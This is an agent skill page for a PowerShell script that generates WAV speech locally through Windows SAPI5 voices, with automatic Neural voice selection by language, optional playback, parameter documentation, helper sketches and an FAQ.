This skill provides lightweight Windows SAPI5 text-to-speech with Neural voices: it auto-selects the best installed voice for the requested language and writes WAV output without using the GPU.
Add this skill to your agents with `npx playbooks add skill openclaw/skills --skill sapi-ttsl`.
---
name: sapi-tts
description: Windows SAPI5 text-to-speech with Neural voices. Lightweight alternative to GPU-heavy TTS - zero GPU usage, instant generation. Auto-detects best available voice for your language. Works on Windows 10/11.
---
# SAPI5 TTS (Windows)
Lightweight text-to-speech using Windows built-in SAPI5. Zero GPU, instant generation.
## Installation
Save the script below as `tts.ps1` in your skills folder:
```powershell
<#
.SYNOPSIS
Windows SAPI5 TTS - Lightweight text-to-speech
.DESCRIPTION
Uses Windows built-in speech synthesis (SAPI5).
Works with Neural voices (Win11) or legacy voices (Win10).
Zero GPU usage, instant generation.
#>
param(
    [Parameter(Mandatory=$false, Position=0)]
    [string]$Text = "",
    [Parameter(Mandatory=$false)]
    [Alias("Voice", "v")]
    [string]$VoiceName = "",
    [Parameter(Mandatory=$false)]
    [Alias("Lang", "l")]
    [string]$Language = "fr",
    [Parameter(Mandatory=$false)]
    [Alias("o")]
    [string]$Output = "",
    [Parameter(Mandatory=$false)]
    [Alias("r")]
    [ValidateRange(-10, 10)]  # SpeechSynthesizer.Rate only accepts -10..10
    [int]$Rate = 0,
    [Parameter(Mandatory=$false)]
    [Alias("p")]
    [switch]$Play,
    [Parameter(Mandatory=$false)]
    [switch]$ListVoices
)
Add-Type -AssemblyName System.Speech
$synth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$installedVoices = $synth.GetInstalledVoices() | Where-Object { $_.Enabled } | ForEach-Object { $_.VoiceInfo }
if ($ListVoices) {
    Write-Host "`nInstalled SAPI5 voices:`n" -ForegroundColor Cyan
    foreach ($v in $installedVoices) {
        $type = if ($v.Name -match "Online|Neural") { "[Neural]" } else { "[Legacy]" }
        Write-Host " $($v.Name)" -ForegroundColor White -NoNewline
        Write-Host " $type" -ForegroundColor DarkGray -NoNewline
        Write-Host " - $($v.Culture) $($v.Gender)" -ForegroundColor Gray
    }
    Write-Host ""
    $synth.Dispose()
    exit 0
}
if (-not $Text) {
    Write-Error "Text required. Use: .\tts.ps1 'Your text here'"
    Write-Host "Use -ListVoices to see available voices"
    $synth.Dispose()
    exit 1
}
function Select-BestVoice {
    param($voices, $preferredName, $lang)
    # An explicit voice name (partial match) wins over any automatic choice
    if ($preferredName) {
        $match = $voices | Where-Object { $_.Name -like "*$preferredName*" } | Select-Object -First 1
        if ($match) { return $match }
        Write-Warning "Voice '$preferredName' not found, auto-selecting..."
    }
    # Map short codes and language names to culture names; anything else is used as-is
    $cultureMap = @{
        "fr" = "fr-FR"; "french" = "fr-FR"
        "en" = "en-US"; "english" = "en-US"
        "de" = "de-DE"; "german" = "de-DE"
        "es" = "es-ES"; "spanish" = "es-ES"
        "it" = "it-IT"; "italian" = "it-IT"
    }
    $targetCulture = $cultureMap[$lang.ToLower()]
    if (-not $targetCulture) { $targetCulture = $lang }
    # 1. Neural voice in the target culture
    $neuralMatch = $voices | Where-Object {
        $_.Name -match "Online|Neural" -and $_.Culture.Name -eq $targetCulture
    } | Select-Object -First 1
    if ($neuralMatch) { return $neuralMatch }
    # 2. Any voice in the target culture
    $langMatch = $voices | Where-Object { $_.Culture.Name -eq $targetCulture } | Select-Object -First 1
    if ($langMatch) { return $langMatch }
    # 3. Any Neural voice, regardless of culture
    $anyNeural = $voices | Where-Object { $_.Name -match "Online|Neural" } | Select-Object -First 1
    if ($anyNeural) { return $anyNeural }
    # 4. Whatever is installed first
    return $voices | Select-Object -First 1
}
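$selectedVoice = Select-BestVoice -voices $installedVoices -preferredName $VoiceName -lang $Language
if (-not $selectedVoice) {
    Write-Error "No SAPI5 voices found! Install voices in Windows Settings > Time & Language > Speech"
    $synth.Dispose()
    exit 1
}
if (-not $Output) {
    # Default: timestamped file in the OpenClaw workspace
    $ttsDir = "$env:USERPROFILE\.openclaw\workspace\tts"
    if (-not (Test-Path $ttsDir)) { New-Item -ItemType Directory -Path $ttsDir -Force | Out-Null }
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $Output = "$ttsDir\sapi_$timestamp.wav"
} else {
    # .NET resolves relative paths against the process directory, not the
    # PowerShell location, so turn -Output into an absolute path first
    $Output = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Output)
}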
try {
    $synth.SelectVoice($selectedVoice.Name)
    $synth.Rate = $Rate
    $synth.SetOutputToWaveFile($Output)
    $synth.Speak($Text)
    $synth.SetOutputToNull()  # releases the WAV file handle
    Write-Host "Voice: $($selectedVoice.Name) [$($selectedVoice.Culture)]" -ForegroundColor Cyan
    Write-Host "MEDIA:$Output"
    # Auto-play if requested (uses .NET MediaPlayer, no external player)
    if ($Play) {
        Add-Type -AssemblyName PresentationCore
        $player = New-Object System.Windows.Media.MediaPlayer
        $player.Open([Uri]$Output)
        $player.Play()
        # Opening is asynchronous: wait up to 5 s for the duration to become known,
        # because reading NaturalDuration.TimeSpan before that throws
        $deadline = (Get-Date).AddSeconds(5)
        while ((-not $player.NaturalDuration.HasTimeSpan) -and ((Get-Date) -lt $deadline)) {
            Start-Sleep -Milliseconds 100
        }
        if ($player.NaturalDuration.HasTimeSpan) {
            while ($player.Position -lt $player.NaturalDuration.TimeSpan) {
                Start-Sleep -Milliseconds 100
            }
        }
        $player.Close()
    }
} catch {
    Write-Error "TTS failed: $($_.Exception.Message)"
    exit 1
} finally {
    $synth.Dispose()
}
```
## Quick Start
```powershell
# Generate audio file
.\tts.ps1 "Bonjour, comment vas-tu ?"
# Generate AND play immediately
.\tts.ps1 "Bonjour !" -Play
```
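The script announces the generated file on a line prefixed with `MEDIA:`. A calling script may want to pull the path out of that output. The helper below is a minimal sketch of that parsing step; `Get-MediaPath` is a hypothetical name, not part of the skill, and it only assumes the `MEDIA:<path>` line format printed by `tts.ps1`.

```powershell
# Hypothetical helper: returns the path from the first "MEDIA:<path>" line,
# or $null when no such line is present.
function Get-MediaPath {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match '^MEDIA:(.+)$') {
            return $Matches[1].Trim()
        }
    }
    return $null
}

# Sample lines shaped like the script's output (the values are made up)
$sample = @(
    'Voice: Some Voice [fr-FR]',
    'MEDIA:C:\Users\me\.openclaw\workspace\tts\sapi_20240101_120000.wav'
)
$path = Get-MediaPath -Lines $sample
```

Because the script prints with `Write-Host`, its output is not on the normal pipeline. On PowerShell 5 or later, redirecting the information stream should make it capturable, for example `$lines = .\tts.ps1 "Bonjour !" 6>&1 | ForEach-Object { "$_" }`, after which `Get-MediaPath -Lines $lines` applies.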
## Parameters
| Parameter | Alias | Default | Description |
|-----------|-------|---------|-------------|
| `-Text` | (positional) | required | Text to speak |
| `-VoiceName` | `-Voice`, `-v` | auto | Voice name (partial match OK) |
| `-Language` | `-Lang`, `-l` | fr | Language: `fr`, `en`, `de`, `es`, `it` (or `french`, `english`, ...); any other value is used as a culture name such as `en-GB` |
| `-Output` | `-o` | auto | Output WAV file path |
| `-Rate` | `-r` | 0 | Speed: -10 (slow) to +10 (fast) |
| `-Play` | `-p` | false | Play audio immediately after generation |
| `-ListVoices` | (none) | false | Show installed voices and exit |
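How a `-Language` value turns into a culture name can be shown in isolation. The sketch below copies the lookup table from `tts.ps1`; the function name `Resolve-TargetCulture` is hypothetical and exists only for this illustration.

```powershell
# Hypothetical stand-alone version of the language lookup in tts.ps1
function Resolve-TargetCulture {
    param([string]$Language)
    $cultureMap = @{
        "fr" = "fr-FR"; "french"  = "fr-FR"
        "en" = "en-US"; "english" = "en-US"
        "de" = "de-DE"; "german"  = "de-DE"
        "es" = "es-ES"; "spanish" = "es-ES"
        "it" = "it-IT"; "italian" = "it-IT"
    }
    $key = $Language.ToLower()
    if ($cultureMap.ContainsKey($key)) { return $cultureMap[$key] }
    # Unknown values pass through unchanged, so a full culture name still works
    return $Language
}

$fromCode = Resolve-TargetCulture 'fr'       # short code
$fromName = Resolve-TargetCulture 'English'  # language name, any casing
$passThru = Resolve-TargetCulture 'pt-BR'    # not in the table
```

A bare code that is not in the table (for example `pt`) is passed through as-is and will only match a voice whose culture name is exactly that string, so a full culture name is the safer choice for unlisted languages.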
## Examples
```powershell
# French with auto-play
.\tts.ps1 "Bonjour !" -Lang fr -Play
# English, faster
.\tts.ps1 "Hello there!" -Lang en -Rate 2 -Play
# Specific voice
.\tts.ps1 "Salut !" -Voice "Denise" -Play
# List available voices
.\tts.ps1 -ListVoices
```
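For more than a handful of phrases, the same parameters can be prepared as splattable hashtables and passed to the script in a loop. This is only a sketch: `New-TtsJobs` and the `clip_NN.wav` naming are hypothetical, and the rate is clamped to the -10..10 range the synthesizer accepts.

```powershell
# Hypothetical helper: builds one splattable argument table per phrase.
function New-TtsJobs {
    param(
        [string[]]$Phrases,
        [string]$Language = 'fr',
        [int]$Rate = 0,
        [string]$OutputDir = (Get-Location).Path
    )
    # Keep the rate inside the range tts.ps1 documents (-10..10)
    $safeRate = [Math]::Max(-10, [Math]::Min(10, $Rate))
    $index = 0
    foreach ($phrase in $Phrases) {
        $index++
        @{
            Text     = $phrase
            Language = $Language
            Rate     = $safeRate
            Output   = Join-Path $OutputDir ('clip_{0:D2}.wav' -f $index)
        }
    }
}

$jobs = New-TtsJobs -Phrases 'Hello there!', 'Goodbye!' -Language en -Rate 15 `
    -OutputDir ([System.IO.Path]::GetTempPath())

# Where tts.ps1 is available, each table can be splatted onto the script:
# foreach ($job in $jobs) { & .\tts.ps1 @job }
```

The hashtable keys match the script's parameter names (`Text`, `Language`, `Rate`, `Output`), which is what lets `@job` bind them directly.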
## Installing Neural Voices (Recommended)
Neural voices sound much better than legacy Desktop voices.
### Windows 11
Neural voices are built-in. Go to:
**Settings → Time & Language → Speech → Manage voices**
### Windows 10/11 (More voices)
For additional Neural voices (like French Denise):
1. Install [NaturalVoiceSAPIAdapter](https://github.com/gexgd0419/NaturalVoiceSAPIAdapter)
2. Download voices in **Settings → Time & Language → Speech**
3. Run `.\tts.ps1 -ListVoices` to verify that the new voices are listed
## Performance
- **Generation:** Instant (< 1 second)
- **GPU:** None
- **CPU:** Minimal
- **Quality:** Good (Neural) / Basic (Legacy)
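The timing figure above depends on the machine, the voice, and the text length, so it may be worth measuring locally. The sketch below wraps `Measure-Command` in a small helper; `Measure-TtsCall` is a hypothetical name, and the `Start-Sleep` workload is only a stand-in so the example runs without the script.

```powershell
# Hypothetical helper: times a script block several times and summarizes the runs.
function Measure-TtsCall {
    param(
        [scriptblock]$Action,
        [int]$Runs = 3
    )
    $times = foreach ($i in 1..$Runs) {
        (Measure-Command -Expression $Action).TotalMilliseconds
    }
    $stats = $times | Measure-Object -Average -Maximum
    [pscustomobject]@{
        Runs      = $Runs
        AverageMs = [Math]::Round($stats.Average, 1)
        MaxMs     = [Math]::Round($stats.Maximum, 1)
    }
}

# Stand-in workload; on Windows, swap in the real call, for example:
# Measure-TtsCall -Action { .\tts.ps1 "Bonjour !" -Output "$env:TEMP\bench.wav" }
$result = Measure-TtsCall -Action { Start-Sleep -Milliseconds 20 } -Runs 2
```

The first run usually includes the one-time cost of loading `System.Speech`, so the maximum can sit well above the average.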
## Credits
Made by Pocus 🎩 — AI assistant, with Olive (@Korddie).
## Overview
This skill provides Windows SAPI5 text-to-speech using built-in Neural and legacy voices as a lightweight alternative to GPU-heavy TTS. It generates WAV files instantly with zero GPU usage and auto-selects the best available voice for the requested language. Works on Windows 10 and 11 and supports playback, voice listing, and rate control.
## How it works
The script uses the System.Speech.Synthesis API to enumerate installed SAPI5 voices, prefers Neural (Online) voices when available, and falls back to any voice in the requested language, then to the first available voice. It writes output to a WAV file (auto-path or user-specified) and can optionally play audio via .NET MediaPlayer. Voice selection supports partial name matching and a simple language-to-culture map for common languages.
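The fallback order can be tried without any installed voices by running the same rules over mock objects. This is a simplified sketch: `Select-VoiceSketch` is a hypothetical function, the voice names are sample data, and `Culture` is a plain string here, whereas the real script compares `Culture.Name`.

```powershell
# Mock voices (sample data, not a list of what any machine has installed)
$mockVoices = @(
    [pscustomobject]@{ Name = 'Sample Hortense Desktop';         Culture = 'fr-FR' }
    [pscustomobject]@{ Name = 'Sample Denise Online (Natural)';  Culture = 'fr-FR' }
    [pscustomobject]@{ Name = 'Sample Zira Desktop';             Culture = 'en-US' }
)

# Hypothetical, simplified version of the selection rules in tts.ps1
function Select-VoiceSketch {
    param([object[]]$Voices, [string]$Culture)
    # 1. Neural voice in the target culture
    $pick = $Voices | Where-Object { $_.Name -match 'Online|Neural' -and $_.Culture -eq $Culture } |
        Select-Object -First 1
    if ($pick) { return $pick }
    # 2. Any voice in the target culture
    $pick = $Voices | Where-Object { $_.Culture -eq $Culture } | Select-Object -First 1
    if ($pick) { return $pick }
    # 3. Any Neural voice, whatever its culture
    $pick = $Voices | Where-Object { $_.Name -match 'Online|Neural' } | Select-Object -First 1
    if ($pick) { return $pick }
    # 4. First voice in the list
    return $Voices | Select-Object -First 1
}

$french  = Select-VoiceSketch -Voices $mockVoices -Culture 'fr-FR'  # rule 1 applies
$english = Select-VoiceSketch -Voices $mockVoices -Culture 'en-US'  # rule 2 applies
$german  = Select-VoiceSketch -Voices $mockVoices -Culture 'de-DE'  # rule 3 applies
```

Note the consequence of rule 3: when no voice exists for the requested language, a Neural voice in a different language is chosen over a legacy one, so the text may be read with the wrong pronunciation rather than failing.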
## FAQ
### Which Windows versions are supported?
Windows 10 and Windows 11. Neural voices are built-in on Windows 11; Windows 10 can use added voices via adapters or downloads.
### How do I get higher-quality voices?
Use Windows 11 Neural voices or install extra voices via Settings → Time & Language → Speech. NaturalVoiceSAPIAdapter can provide additional Neural voice options on some setups.
### Can I control speech speed?
Yes. Use `-Rate` with values from -10 (slow) to +10 (fast).
### Does this use GPU or cloud services?
No GPU is used, and the script itself runs locally without calling a cloud TTS service. Voices labelled "Online" that are supplied by an adapter may rely on their provider's online service, so check the adapter's documentation if offline use matters.